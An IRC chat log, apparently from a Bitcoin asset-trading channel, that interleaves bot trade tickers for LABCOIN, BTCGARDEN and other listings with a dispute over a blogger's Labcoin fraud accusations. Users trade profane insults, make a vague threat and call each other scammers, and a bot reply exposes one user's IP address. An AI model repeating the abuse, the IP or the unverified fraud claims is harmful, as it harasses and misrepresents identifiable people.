BTC [+] Aug 01 06:44:14 [BTCTC] [LABCOIN] 600 @ 0.00275 = 1.65 BTC [-] Aug 01 06:44:16 i should be identified Aug 01 06:44:16 [BTCTC] [LABCOIN] 3000 @ 0.00271 = 8.13 BTC [-] Aug 01 06:44:18 wierdness Aug 01 06:44:18 [BTCTC] [LABCOIN] 198 @ 0.002705 = 0.5356 BTC [-] Aug 01 06:44:19 so you avoid mr pizzaboy's problem in 2015 Aug 01 06:44:20 [BTCTC] [LABCOIN] 1000 @ 0.0027 = 2.7 BTC [-] Aug 01 06:44:22 [BTCTC] [BTCGARDEN] 15 @ 0.016 = 0.24 BTC [+] Aug 01 06:44:24 [BTCTC] [LABCOIN] 3500 @ 0.0027 = 9.45 BTC [-] Aug 01 06:44:24 Somewhere within the first week of each month Aug 01 06:44:27 [BTCTC] [LABCOIN] 500 @ 0.002662 = 1.331 BTC [-] Aug 01 06:44:29 [BTCTC] [LABCOIN] 435 @ 0.002662 = 1.158 BTC [-] Aug 01 06:44:31 [BTCTC] [LABCOIN] 5000 @ 0.002661 = 13.305 BTC [-] Aug 01 06:44:33 [BTCTC] [LABCOIN] 4694 @ 0.00266 = 12.486 BTC [-] Aug 01 06:44:35 [BTCTC] [LABCOIN] 700 @ 0.00265 = 1.855 BTC [-] Aug 01 06:44:37 [BTCTC] [LABCOIN] 1043 @ 0.002621 = 2.7337 BTC [-] Aug 01 06:44:38 mircea_popescu: I trade on localbitcoins and bitbargain Aug 01 06:44:38 [BTCTC] [LABCOIN] 1000 @ 0.00262 = 2.62 BTC [-] Aug 01 06:44:40 [BTCTC] [LABCOIN] 2000 @ 0.00261 = 5.22 BTC [-] Aug 01 06:44:43 [BTCTC] [LABCOIN] 337 @ 0.002601 = 0.8765 BTC [-] Aug 01 06:44:45 [BTCTC] [LABCOIN] 1350 @ 0.002601 = 3.5114 BTC [-] Aug 01 06:44:48 [BTCTC] [BTCGARDEN] 980 @ 0.016 = 15.68 BTC [+] Aug 01 06:44:50 [BTCTC] [LABCOIN] 50 @ 0.002601 = 0.1301 BTC [-] Aug 01 06:44:52 [BTCTC] [LABCOIN] 6496 @ 0.0026 = 16.8896 BTC [-] Aug 01 06:44:54 pizza_deliveri just stfu, make a wot, come back in a few years. Aug 01 06:44:56 why need gpg and spend hours sitting in irc channels Aug 01 06:45:01 I made a WOT already Aug 01 06:45:07 i've been here since yesterday, wanna buy shares in my ipo? Aug 01 06:45:09 ;;ident pizza_deliveri Aug 01 06:45:10 Nick 'pizza_deliveri', with hostmask 'pizza_deliveri!5ce9498f@gateway/web/freenode/ip.92.233.73.143', is not identified. Aug 01 06:45:14 not as far as i can see. Aug 01 06:45:20 hold up Aug 01 06:45:29 ;;ident paranoid Aug 01 06:45:30 Error: I am not seeing this user on IRC. If you want information about a registered gpg user, try the 'gpg info' command instead. Aug 01 06:45:33 [BTCTC] [BTCGARDEN] 600 @ 0.016 = 9.6 BTC [+] Aug 01 06:45:38 whoa! nobody paranoid is on irc! Aug 01 06:45:44 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 01 06:45:44 that's like... a first innit. Aug 01 06:45:51 ;;ident bitmillionairs Aug 01 06:45:51 Error: I am not seeing this user on IRC. If you want information about a registered gpg user, try the 'gpg info' command instead. Aug 01 06:45:52 can someone tell me what this pseudo-argument is about? Aug 01 06:45:55 [BTCTC] [BTCGARDEN] 4 @ 0.016 = 0.064 BTC [+] Aug 01 06:45:58 [BTCTC] [BTCGARDEN] 31800 @ 0.016 = 508.8 BTC [+] Aug 01 06:46:05 woah Aug 01 06:46:06 wha Aug 01 06:46:08 Urushiol just random interwebs butthurt. safe to ignore. Aug 01 06:46:11 woulda thought Aug 01 06:46:13 lol, fucking idiot Aug 01 06:46:18 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 01 06:46:24 [BTCTC] [LABCOIN] 1 @ 0.0032 BTC [+] Aug 01 06:46:25 [BTCTC] [BTCGARDEN] 31800 @ 0.016 = 508.8 BTC [+] Aug 01 06:46:25 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 01 06:46:30 [BTCTC] [BTCGARDEN] 8 @ 0.016 = 0.128 BTC [+] Aug 01 06:46:30 lol Aug 01 06:46:34 [BTCTC] [BTCGARDEN] 31800 @ 0.016 = 508.8 BTC [+] Aug 01 06:46:38 look! it did it again! Aug 01 06:46:44 wtf Aug 01 06:46:48 [BTCTC] [LABCOIN] 1 @ 0.002666 BTC [-] Aug 01 06:46:50 [BTCTC] [LABCOIN] 399 @ 0.002665 = 1.0633 BTC [-] Aug 01 06:46:52 1500btc Aug 01 06:46:53 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 01 06:46:54 lol what a waste of 500btc Aug 01 06:46:54 that's 1500 in three minutes! vivat fakebtc! Aug 01 06:46:57 [BTCTC] [BTCGARDEN] 1 @ 0.0159 BTC [-] Aug 01 06:46:59 [BTCTC] [BTCGARDEN] 1999 @ 0.016 = 31.984 BTC [+] Aug 01 06:47:10 [BTCTC] [ACTIVEMINING] 395 @ 0.0063 = 2.4885 BTC [-] Aug 01 06:47:12 omg bitcoins been hacked Aug 01 06:47:14 [BTCTC] [BTCGARDEN] 150 @ 0.016 = 2.4 BTC [+] Aug 01 06:47:19 reddit.com/r/bitcoin Aug 01 06:47:34 [BTCTC] [ACTIVEMINING] 1 @ 0.0063 BTC [-] Aug 01 06:47:39 laque_: =| Aug 01 06:47:42 [BTCTC] [BTCGARDEN] 1 @ 0.01599 BTC [-] Aug 01 06:47:49 joking. i blame vancleef Aug 01 06:47:52 lol Aug 01 06:47:57 [BTCTC] [BTCGARDEN] 687 @ 0.01599 = 10.9851 BTC [-] Aug 01 06:48:05 everyone must be thumbs downing the hack... can't find it haha Aug 01 06:48:09 [BTCTC] [BTCGARDEN] 4213 @ 0.016 = 67.408 BTC [+] Aug 01 06:48:11 lol Aug 01 06:48:14 hacks are bad mmkay Aug 01 06:48:18 i got blammed for activemining too Aug 01 06:48:19 [BTCTC] [LABCOIN] 1 @ 0.003198 BTC [+] Aug 01 06:48:26 [BTCTC] [BTCGARDEN] 5000 @ 0.016 = 80 BTC [+] Aug 01 06:48:27 [BTCTC] [LABCOIN] 200 @ 0.003198 = 0.6396 BTC [+] Aug 01 06:48:32 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 01 06:48:38 [BTCTC] [BTCGARDEN] 5312 @ 0.016 = 84.992 BTC [+] Aug 01 06:48:42 urushiol: to summarise, mircea_popescu posted some usernames on his blog, one of them belonging to myself; he claimed these were 'hacked' and part of labcoin conspiracy to defraud Aug 01 06:48:47 until pizza showed up i thought you were the trouble maker cleef Aug 01 06:48:51 damn can you maniacs stop it? Aug 01 06:49:02 urushiol: what he did'n'r realise is that one of those guys is me, and completely unrelated to labcoin Aug 01 06:49:13 Wild0wnes best i can tell he just has very off-brand sarcasm. Aug 01 06:49:19 [BTCTC] [LABCOIN] 50 @ 0.003195 = 0.1598 BTC [-] Aug 01 06:49:35 you don't want to get caught posting obvious lies so you just keep it online Aug 01 06:49:37 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 06:49:39 [BTCTC] [LABCOIN] 21 @ 0.003195 = 0.0671 BTC [-] Aug 01 06:49:41 surprising... Aug 01 06:49:43 Aug 01 06:11:01 When I sell off Aug 01 06:49:44 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 01 06:49:45 [BTCTC] [LABCOIN] 6 @ 0.003195 = 0.0192 BTC [-] Aug 01 06:49:50 surely you aren't suggesting a blogger didn't do sufficient research before "reporting" Aug 01 06:49:50 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 01 06:49:51 you know, at least you could keep track of what you say right here. Aug 01 06:50:04 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 06:50:06 [BTCTC] [RSM] 7 @ 0.01401 = 0.0981 BTC [-] Aug 01 06:50:19 i mean, not being able to back any claim up is one thing. slipping up and making contradictory claims within an hour of open interview is another. Aug 01 06:50:22 [BTCTC] [LABCOIN] 23 @ 0.003195 = 0.0735 BTC [-] Aug 01 06:50:25 [BTCTC] [LABCOIN] 27 @ 0.003195 = 0.0863 BTC [-] Aug 01 06:50:38 maybe you're just too stupid to be here ? Aug 01 06:50:50 [HAVELOCK] [AM100] 1 @ 0.0397 BTC [+] Aug 01 06:50:58 mircea_popescu: you've been caught out Aug 01 06:51:09 right, because reversal works. glwt. Aug 01 06:51:10 I've told you the 'expose' you posted was wrong Aug 01 06:51:33 yea you can't just make random accusations that I'm working for some company involved in conspiracy to defraud Aug 01 06:51:42 anyway, enough fun for now, gotta go water my eve corp. later all. Aug 01 06:51:50 you fucking cunt Aug 01 06:51:59 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 01 06:52:03 I'll put effort into go after you for this Aug 01 06:52:12 pizza.... now now Aug 01 06:52:15 as if you can't even admit when you've made a mistake Aug 01 06:52:21 I hate people like you Aug 01 06:52:22 [BTCTC] [LABCOIN] 100 @ 0.002712 = 0.2712 BTC [-] Aug 01 06:52:25 [BTCTC] [TAT.MINIGAME] 3849 @ 0.00027 = 1.0392 BTC [-] Aug 01 06:52:26 just say opps sorry, and move on Aug 01 06:52:36 instead you start playing a game Aug 01 06:52:54 cunt is a term of endearment Aug 01 06:52:56 [BTCTC] [BTCGARDEN] 162 @ 0.016 = 2.592 BTC [+] Aug 01 06:52:57 Ignored the stuff i told you too about labcoin Aug 01 06:52:59 [BTCTC] [RSM] 1 @ 0.014 BTC [-] Aug 01 06:53:03 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 06:53:13 [BTCTC] [BTCGARDEN] 41 @ 0.016 = 0.656 BTC [+] Aug 01 06:53:15 did you even check the reddit I posted, and yet you have the nerve to say I'm "shilling" for them Aug 01 06:53:30 [BTCTC] [BTCGARDEN] 450 @ 0.016 = 7.2 BTC [+] Aug 01 06:53:31 [BTCTC] [LABCOIN] 1 @ 0.003189 BTC [+] Aug 01 06:53:34 [BTCTC] [LABCOIN] 34 @ 0.00319 = 0.1085 BTC [+] Aug 01 06:53:40 I've been around for longer than you and you wanna get on your high horse just cause you waste hours in irc and making up storys on blogs Aug 01 06:53:57 Well it's his blog, he can pretty much write anything on it, pizza. Trying to fight against mircea is useless. Plus going after him? He's all the way over there in Romania, already having an army of troll attacking him on the forum. He does not care the least. Aug 01 06:54:06 he is in romania? Aug 01 06:54:17 [MPEX] [S.MPOE] 3638 @ 0.00080763 = 2.9382 BTC [-] Aug 01 06:54:17 Yeah, he's romanian. Aug 01 06:54:18 [MPEX] [S.MPOE] 10262 @ 0.00080626 = 8.2738 BTC [-] Aug 01 06:54:18 timasoea Aug 01 06:54:18 pizza_deliveri: the people on that "list" were actually all people minus MPOE-PR from labcoin thread #38, no more, no less Aug 01 06:54:27 timasora* Aug 01 06:54:30 [BTCTC] [LABCOIN] 1848 @ 0.003188 = 5.8914 BTC [-] Aug 01 06:54:45 dexx7: actually i don't know why I'm so worked up about it Aug 01 06:54:45 [BTCTC] [LABCOIN] 25 @ 0.003189 = 0.0797 BTC [+] Aug 01 06:54:49 [BTCTC] [LABCOIN] 401 @ 0.00319 = 1.2792 BTC [+] Aug 01 06:54:51 [BTCTC] [LABCOIN] 23 @ 0.003195 = 0.0735 BTC [+] Aug 01 06:54:56 [BTCTC] [LABCOIN] 346 @ 0.003198 = 1.1065 BTC [+] Aug 01 06:54:58 [BTCTC] [BTCGARDEN] 9 @ 0.016 = 0.144 BTC [+] Aug 01 06:55:03 just thought it's a bit weird and surprised he didn't remove it after realising info is wrong Aug 01 06:55:08 so anyone else signed up for the internet bank? Aug 01 06:55:12 cause you a scammor Aug 01 06:55:18 [BTCTC] [BTCGARDEN] 4000 @ 0.016 = 64 BTC [+] Aug 01 06:55:18 credit union? Aug 01 06:55:20 ya Aug 01 06:55:24 [BTCTC] [BTCGARDEN] 1 @ 0.0159 BTC [-] Aug 01 06:55:27 [BTCTC] [BTCGARDEN] 119 @ 0.0159 = 1.8921 BTC [-] Aug 01 06:55:31 thestringpuller: ?? Aug 01 06:55:34 [BTCTC] [LABCOIN] 463 @ 0.003189 = 1.4765 BTC [-] Aug 01 06:55:36 I would if it was local Aug 01 06:55:37 [BTCTC] [LABCOIN] 37 @ 0.003189 = 0.118 BTC [-] Aug 01 06:55:41 was a simple form online Aug 01 06:55:48 [BTCTC] [BTCGARDEN] 250 @ 0.016 = 4 BTC [+] Aug 01 06:56:18 the talk they gave at the (SanFran?) bitcoin conf was pretty interesting so i thought why not try it out Aug 01 06:56:27 [BTCTC] [BITVPS] 25 @ 0.001616 = 0.0404 BTC [-] Aug 01 06:56:38 they were also the ones to untuck the Bitfloor debacle Aug 01 06:56:42 unfuck* Aug 01 06:56:43 same dudes as the wayback machine Aug 01 06:57:08 [BTCTC] [BITVPS] 5 @ 0.001615 = 0.0081 BTC [-] Aug 01 06:57:58 not that the wayback machine is proof of anything but they been around longer than dirt Aug 01 06:58:41 [BTCTC] [ACTIVEMINING] 3 @ 0.006255 = 0.0188 BTC [-] Aug 01 06:58:43 [BTCTC] [ACTIVEMINING] 64 @ 0.006245 = 0.3997 BTC [-] Aug 01 06:58:50 [BTCTC] [ACTIVEMINING] 2 @ 0.006 = 0.012 BTC [-] Aug 01 06:59:00 [BTCTC] [ASICMINER-PT] 1 @ 4.132 BTC [+] Aug 01 06:59:04 [BTCTC] [BITVPS] 18 @ 0.001608 = 0.0289 BTC [-] Aug 01 06:59:08 [BTCTC] [LABCOIN] 4 @ 0.0031 = 0.0124 BTC [-] Aug 01 06:59:10 Wild0wnes how long to get set up, How much of your life did you spend getting signed up on the credit union? Aug 01 06:59:13 yeah IAFCU Aug 01 06:59:36 [BTCTC] [BTCGARDEN] 48 @ 0.016 = 0.768 BTC [+] Aug 01 06:59:39 it took like 10 minutes, then they call you with account numbers and the details Aug 01 06:59:40 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 06:59:46 This week's flavor is circlejerking: https://bitcointalk.org/index.php?topic=265172.0 Aug 01 06:59:51 thanks Aug 01 06:59:53 like 5 minutes for the online form.... who knows what happens next... perhaps they fedex me a stack of homework Aug 01 06:59:55 [BTCTC] [BTCGARDEN] 1 @ 0.01598 BTC [-] Aug 01 06:59:56 [BTCTC] [LABCOIN] 15 @ 0.0028 = 0.042 BTC [-] Aug 01 06:59:58 [BTCTC] [BTCGARDEN] 129 @ 0.01595 = 2.0576 BTC [-] Aug 01 07:00:28 ;;genrate 10000 Aug 01 07:00:29 nope, just a card in the mailbox Aug 01 07:00:29 The expected generation output, at 10000.0 Mhps, given difficulty of 31256960.7278, is 0.160894247144 BTC per day and 0.00670392696434 BTC per hour. Aug 01 07:00:30 I suspect living in eastern Europe develops a healthy sense of paranoia... Aug 01 07:00:41 [BTCTC] [BTCGARDEN] 1 @ 0.01598 BTC [+] Aug 01 07:00:44 [BTCTC] [BTCGARDEN] 26 @ 0.016 = 0.416 BTC [+] Aug 01 07:00:53 romania is not so bad,, you can sell potatoes Aug 01 07:00:58 [BTCTC] [BTCGARDEN] 260 @ 0.016 = 4.16 BTC [+] Aug 01 07:01:03 [BTCTC] [BTCGARDEN] 23000 @ 0.016 = 368 BTC [+] Aug 01 07:01:19 a debit card in the mail and i'm done? Aug 01 07:01:26 that don't sound right at all Aug 01 07:01:29 [BTCTC] [ASICMINER-PT] 1 @ 4.132 BTC [+] Aug 01 07:01:31 [BTCTC] [BTCGARDEN] 4 @ 0.016 = 0.064 BTC [+] Aug 01 07:01:32 [BTCTC] [LABCOIN] 1 @ 0.002989 BTC [+] Aug 01 07:01:34 i could have signed up my mom Aug 01 07:01:36 Namworld did you notice that the sandstorm dude gave you kudos? I'm guessing he catch the reference Aug 01 07:01:37 [BTCTC] [BTCGARDEN] 1832 @ 0.016 = 29.312 BTC [+] Aug 01 07:01:37 [BTCTC] [LABCOIN] 485 @ 0.0028 = 1.358 BTC [-] Aug 01 07:01:41 [BTCTC] [LABCOIN] 1015 @ 0.002702 = 2.7425 BTC [-] Aug 01 07:01:45 [BTCTC] [LABCOIN] 985 @ 0.002702 = 2.6615 BTC [-] Aug 01 07:01:46 Yes, I think he does. Aug 01 07:01:46 [BTCTC] [ACTIVEMINING] 25 @ 0.005798 = 0.145 BTC [-] Aug 01 07:01:47 didn't ask for an ID or anything Aug 01 07:01:48 [BTCTC] [LABCOIN] 4100 @ 0.002701 = 11.0741 BTC [-] Aug 01 07:02:02 https://en.wikipedia.org/wiki/Nicolae_Ceau%C8%99escu Aug 01 07:02:03 I think we have what … 10-20 minutes until the 3 confirms for people to transfer money into btct for btcgarden? Aug 01 07:02:13 Probably is just puzzled about that whole ordeal. Aug 01 07:02:14 not always the nicest place Aug 01 07:02:28 [BTCTC] [ACTIVEMINING] 25 @ 0.005798 = 0.145 BTC [-] Aug 01 07:02:29 [BTCTC] [BTCGARDEN] 250 @ 0.016 = 4 BTC [+] Aug 01 07:02:34 [BTCTC] [ACTIVEMINING] 15 @ 0.005797 = 0.087 BTC [-] Aug 01 07:02:35 [BTCTC] [LABCOIN] 500 @ 0.002701 = 1.3505 BTC [-] Aug 01 07:02:39 [BTCTC] [LABCOIN] 1000 @ 0.002701 = 2.701 BTC [-] Aug 01 07:02:42 [BTCTC] [LABCOIN] 50 @ 0.002701 = 0.1351 BTC [-] Aug 01 07:02:48 [BTCTC] [BTCGARDEN] 260 @ 0.016 = 4.16 BTC [+] Aug 01 07:03:28 [BTCTC] [LABCOIN] 31 @ 0.002801 = 0.0868 BTC [+] Aug 01 07:03:33 [BTCTC] [LABCOIN] 10 @ 0.002801 = 0.028 BTC [+] Aug 01 07:03:36 [BTCTC] [BTCGARDEN] 5 @ 0.016 = 0.08 BTC [+] Aug 01 07:03:45 should i be buying BTCgarden next? Aug 01 07:03:55 yes Aug 01 07:03:56 yeah i just got 500btc worth Aug 01 07:04:00 as long as you're already mining labcoin Aug 01 07:04:14 buy all the scams Aug 01 07:04:21 [BTCTC] [ASICMINER-PT] 1 @ 4.131 BTC [-] Aug 01 07:04:22 btcgarden,labcoin junk Aug 01 07:04:25 another 500btc in btcgarden soon Aug 01 07:04:26 [BTCTC] [LABCOIN] 165 @ 0.003098 = 0.5112 BTC [+] Aug 01 07:04:32 [BTCTC] [ASICMINER-PT] 1 @ 4.13 BTC [-] Aug 01 07:04:35 coming soon: afrominer Aug 01 07:04:43 ;;calc .0031 * 10000 Aug 01 07:04:43 31 Aug 01 07:04:51 ;;calc .0031 * 5000 Aug 01 07:04:51 15.5 Aug 01 07:04:54 99776333 THs Aug 01 07:04:58 if I add jerry-curl juice does it go faster? Aug 01 07:04:58 [BTCTC] [LABCOIN] 1 @ 0.0031 BTC [+] Aug 01 07:04:59 2 weeks Aug 01 07:05:02 ;;calc .0031 * 2500 Aug 01 07:05:02 7.75 Aug 01 07:05:05 [BTCTC] [LABCOIN] 155 @ 0.003098 = 0.4802 BTC [-] Aug 01 07:05:07 i wanna ride a pumpandcump just once Aug 01 07:05:15 i missed all the lapcoin fun Aug 01 07:05:15 ;;genrate 2500 Aug 01 07:05:16 The expected generation output, at 2500.0 Mhps, given difficulty of 31256960.7278, is 0.040223561786 BTC per day and 0.00167598174108 BTC per hour. Aug 01 07:05:45 pizza_deliveri: what makes you think btcgarden is junk? Aug 01 07:06:00 btcgarden needs > 25k bitcoin till trading start..´ Aug 01 07:06:05 could take a while Aug 01 07:06:25 400mh/s @ max 3.75w Aug 01 07:06:29 btct should have a realtime orderbook Aug 01 07:06:31 [BTCTC] [LABCOIN] 2 @ 0.00271 = 0.0054 BTC [-] Aug 01 07:06:31 sold domestic on taobao Aug 01 07:06:33 [BTCTC] [LABCOIN] 23 @ 0.00271 = 0.0623 BTC [-] Aug 01 07:06:36 + risk of another 40000000 at any time > 0.016 Aug 01 07:06:36 [BTCTC] [LABCOIN] 77 @ 0.00271 = 0.2087 BTC [-] Aug 01 07:06:48 and live feeds of specific assets Aug 01 07:06:55 [BTCTC] [ACTIVEMINING] 25 @ 0.006199 = 0.155 BTC [+] Aug 01 07:06:57 [BTCTC] [ACTIVEMINING] 37 @ 0.0062 = 0.2294 BTC [+] Aug 01 07:07:04 is this data in the api? Aug 01 07:07:13 [BTCTC] [ACTIVEMINING] 25 @ 0.0058 = 0.145 BTC [-] Aug 01 07:07:18 [BTCTC] [ASICMINER-PT] 1 @ 4.198 BTC [+] Aug 01 07:07:22 [BTCTC] [BTCGARDEN] 15 @ 0.016 = 0.24 BTC [+] Aug 01 07:07:22 yes Aug 01 07:07:24 [HAVELOCK] [AM100] 166 @ 0.0397 = 6.5902 BTC [+] Aug 01 07:07:27 [HAVELOCK] [AM100] 61 @ 0.0398999 = 2.4339 BTC [+] Aug 01 07:07:29 [HAVELOCK] [AM100] 438 @ 0.0399 = 17.4762 BTC [+] Aug 01 07:07:41 [HAVELOCK] [AM100] 2 @ 0.0399 = 0.0798 BTC [+] Aug 01 07:07:51 [BTCTC] [BTCGARDEN] 2500 @ 0.016 = 40 BTC [+] Aug 01 07:08:25 dexX7_, is there something i can plug the key into Aug 01 07:08:36 some kinda tool/utility thin Aug 01 07:08:38 labcoin has been fun, but not nearly the ride that ActM gave last weekend. Aug 01 07:09:00 [BTCTC] [BTCGARDEN] 25 @ 0.016 = 0.4 BTC [+] Aug 01 07:09:01 made much more with labcoin though Aug 01 07:09:14 [BTCTC] [LABCOIN] 50 @ 0.003 = 0.15 BTC [+] Aug 01 07:09:23 [BTCTC] [LABCOIN] 100 @ 0.003 = 0.3 BTC [+] Aug 01 07:09:36 [BTCTC] [LABCOIN] 1300 @ 0.003 = 3.9 BTC [+] Aug 01 07:09:59 so can sooombody esplain to me why there are different prices in btcgarden if its an ipo? Aug 01 07:10:01 [BTCTC] [LABCOIN] 2500 @ 0.003 = 7.5 BTC [+] Aug 01 07:10:15 do you do the initial ipo order somewhere else? Aug 01 07:10:17 [BTCTC] [BASIC-MINING] 1 @ 0.405 BTC [+] Aug 01 07:10:25 just people who already bought putting up higher asks Aug 01 07:10:30 afrotec: you can pull https://btct.co/api/orders/COGNITIVE frequently - afaik there is no public trading tool for btct Aug 01 07:10:31 Because people are selling under the IPO price Aug 01 07:10:33 [BTCTC] [LABCOIN] 25 @ 0.003 = 0.075 BTC [+] Aug 01 07:10:56 [BTCTC] [BTCGARDEN] 180 @ 0.01595 = 2.871 BTC [-] Aug 01 07:11:04 ;;genrate 1000 Aug 01 07:11:05 The expected generation output, at 1000.0 Mhps, given difficulty of 31256960.7278, is 0.0160894247144 BTC per day and 0.000670392696434 BTC per hour. Aug 01 07:11:06 what would be the reason for that? Aug 01 07:11:13 oh, are there really sales under .016? lol Aug 01 07:11:24 wow, there are Aug 01 07:11:32 <_scrybe> folks trying to make it tank Aug 01 07:11:33 [BTCTC] [LABCOIN] 1365 @ 0.003 = 4.095 BTC [+] Aug 01 07:11:35 [BTCTC] [BASIC-MINING] 1 @ 0.4014 BTC [-] Aug 01 07:11:37 <_scrybe> maniputards Aug 01 07:11:48 <_scrybe> or just fools Aug 01 07:11:49 [BTCTC] [LABCOIN] 50 @ 0.003 = 0.15 BTC [+] Aug 01 07:11:50 probably because people panic bought the ipo and now realize that it's going to take much longer to sell these shares than labcoin Aug 01 07:11:57 [BTCTC] [LABCOIN] 153 @ 0.003 = 0.459 BTC [+] Aug 01 07:12:18 [BTCTC] [LABCOIN] 50 @ 0.003 = 0.15 BTC [+] Aug 01 07:12:29 <_scrybe> didn't even open the details and see the share counts or do any math, likely Aug 01 07:12:42 [HAVELOCK] [AM100] 1 @ 0.0399 BTC [+] Aug 01 07:12:56 [00:11] <_scrybe> maniputards Aug 01 07:13:16 What? That's nonsense. No manipulation there Aug 01 07:13:18 <_scrybe> like it? Aug 01 07:13:21 [BTCTC] [ACTIVEMINING] 25 @ 0.005802 = 0.1451 BTC [+] Aug 01 07:13:23 [BTCTC] [LABCOIN] 1000 @ 0.003 = 3 BTC [+] Aug 01 07:13:24 [BTCTC] [KENILWORTH] 155 @ 0.001512 = 0.2344 BTC [-] Aug 01 07:13:26 [BTCTC] [ACTIVEMINING] 3 @ 0.005801 = 0.0174 BTC [-] Aug 01 07:13:30 [BTCTC] [ACTIVEMINING] 3072 @ 0.005801 = 17.8207 BTC [-] Aug 01 07:13:39 No... that's nonsense. Just the huge IPO wall is enough. Aug 01 07:13:41 [BTCTC] [LABCOIN] 2500 @ 0.003 = 7.5 BTC [+] Aug 01 07:13:43 there are still 1.6 million out of 2 million shares held by the issuer Aug 01 07:13:55 Only 10% of IPO sold out. Aug 01 07:13:56 [BTCTC] [BTCGARDEN] 42 @ 0.016 = 0.672 BTC [+] Aug 01 07:14:02 these guys are trying to rape and pillage Aug 01 07:14:10 8 million held by issuer Aug 01 07:14:10 <_scrybe> agreed, but I have seen REALLY bad manipulators, just like really bad traders Aug 01 07:14:16 [BTCTC] [LABCOIN] 2907 @ 0.003 = 8.721 BTC [+] Aug 01 07:14:18 With only 2m more to be put for sale Aug 01 07:14:32 yeah only 2million in the first tranche Aug 01 07:14:33 oh sorry. buyers want .015950 not sellers Aug 01 07:14:38 <_scrybe> 3.1M left to sell, there are 2x 2M issues Aug 01 07:14:45 <_scrybe> err 3.6 Aug 01 07:14:45 [BTCTC] [LABCOIN] 452 @ 0.003 = 1.356 BTC [+] Aug 01 07:14:47 [BTCTC] [LABCOIN] 50 @ 0.00308 = 0.154 BTC [+] Aug 01 07:14:49 [BTCTC] [LABCOIN] 99 @ 0.003089 = 0.3058 BTC [+] Aug 01 07:14:51 yeah, but the second tranche comes later Aug 01 07:14:54 [HAVELOCK] [AM100] 3 @ 0.0399 = 0.1197 BTC [+] Aug 01 07:15:16 [BTCTC] [LABCOIN] 1399 @ 0.00309 = 4.3229 BTC [+] Aug 01 07:15:22 <_scrybe> exactly, right below your planned sell position ;) Aug 01 07:15:27 [BTCTC] [ACTIVEMINING] 25 @ 0.006093 = 0.1523 BTC [+] Aug 01 07:15:30 [BTCTC] [ACTIVEMINING] 25 @ 0.006094 = 0.1524 BTC [+] Aug 01 07:15:33 [BTCTC] [ACTIVEMINING] 50 @ 0.006096 = 0.3048 BTC [+] Aug 01 07:15:36 [BTCTC] [ACTIVEMINING] 16 @ 0.006098 = 0.0976 BTC [+] Aug 01 07:15:39 [BTCTC] [ACTIVEMINING] 851 @ 0.006199 = 5.2753 BTC [+] Aug 01 07:15:45 <_scrybe> (my g.dice experience) Aug 01 07:16:23 we should all team up... with all of your brains combined with my .4 BTC we could rue the world Aug 01 07:16:48 rue Aug 01 07:16:51 <_scrybe> put it all in freicoin and hold it! Aug 01 07:16:51 haha Aug 01 07:16:54 lol Aug 01 07:17:07 <_scrybe> lol, just saw that Aug 01 07:17:33 <_scrybe> ok, really checking out, it's been fun Aug 01 07:17:34 [BTCTC] [BTCGARDEN] 20 @ 0.016 = 0.32 BTC [+] Aug 01 07:17:49 [BTCTC] [BTCGARDEN] 4200 @ 0.016 = 67.2 BTC [+] Aug 01 07:18:07 [BTCTC] [BTCGARDEN] 85 @ 0.016 = 1.36 BTC [+] Aug 01 07:18:12 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 01 07:19:34 [BTCTC] [LABCOIN] 1000 @ 0.0028 = 2.8 BTC [-] Aug 01 07:19:44 [HAVELOCK] [SDSTM] 1 @ 0.008899 BTC [+] Aug 01 07:19:50 [BTCTC] [BTCGARDEN] 25 @ 0.016 = 0.4 BTC [+] Aug 01 07:20:03 anyone in here affiliated with that tatminigame? Aug 01 07:20:06 [BTCTC] [BTCGARDEN] 7900 @ 0.016 = 126.4 BTC [+] Aug 01 07:20:43 Wild0wnes i run the underlying, ThickAsThieves runs the pt. Aug 01 07:21:03 hmm, i wonder if burnside forgot about AM div payouts Aug 01 07:21:07 past his usual time Aug 01 07:22:26 mabey he borrowed it to buy some labcoins Aug 01 07:22:28 [BTCTC] [LTC-ATF.B2] 1 @ 0.01043 BTC [+] Aug 01 07:22:29 [BTCTC] [ACTIVEMINING] 25 @ 0.005998 = 0.15 BTC [-] Aug 01 07:22:32 [BTCTC] [ACTIVEMINING] 100 @ 0.005998 = 0.5998 BTC [-] Aug 01 07:22:33 ;-) Aug 01 07:22:37 [BTCTC] [ACTIVEMINING] 42 @ 0.005999 = 0.252 BTC [+] Aug 01 07:22:39 [BTCTC] [ACTIVEMINING] 100 @ 0.005999 = 0.5999 BTC [+] Aug 01 07:23:01 [BTCTC] [LABCOIN] 40 @ 0.0028 = 0.112 BTC [-] Aug 01 07:23:15 [BTCTC] [ACTIVEMINING] 1 @ 0.006197 BTC [+] Aug 01 07:23:16 [BTCTC] [LABCOIN] 235 @ 0.00276 = 0.6486 BTC [-] Aug 01 07:23:32 [BTCTC] [ASICMINER-PT] 1 @ 4.126 BTC [-] Aug 01 07:23:34 [BTCTC] [LABCOIN] 200 @ 0.002759 = 0.5518 BTC [-] Aug 01 07:23:48 [BTCTC] [LABCOIN] 398 @ 0.002715 = 1.0806 BTC [-] Aug 01 07:24:04 [BTCTC] [LABCOIN] 25 @ 0.002715 = 0.0679 BTC [-] Aug 01 07:24:08 [BTCTC] [LABCOIN] 577 @ 0.002715 = 1.5666 BTC [-] Aug 01 07:24:26 [BTCTC] [LABCOIN] 265 @ 0.002714 = 0.7192 BTC [-] Aug 01 07:24:27 [BTCTC] [LABCOIN] 258 @ 0.002713 = 0.7 BTC [-] Aug 01 07:24:50 why did ActM shoot up and then fall today? Aug 01 07:24:54 [BTCTC] [LABCOIN] 336 @ 0.002715 = 0.9122 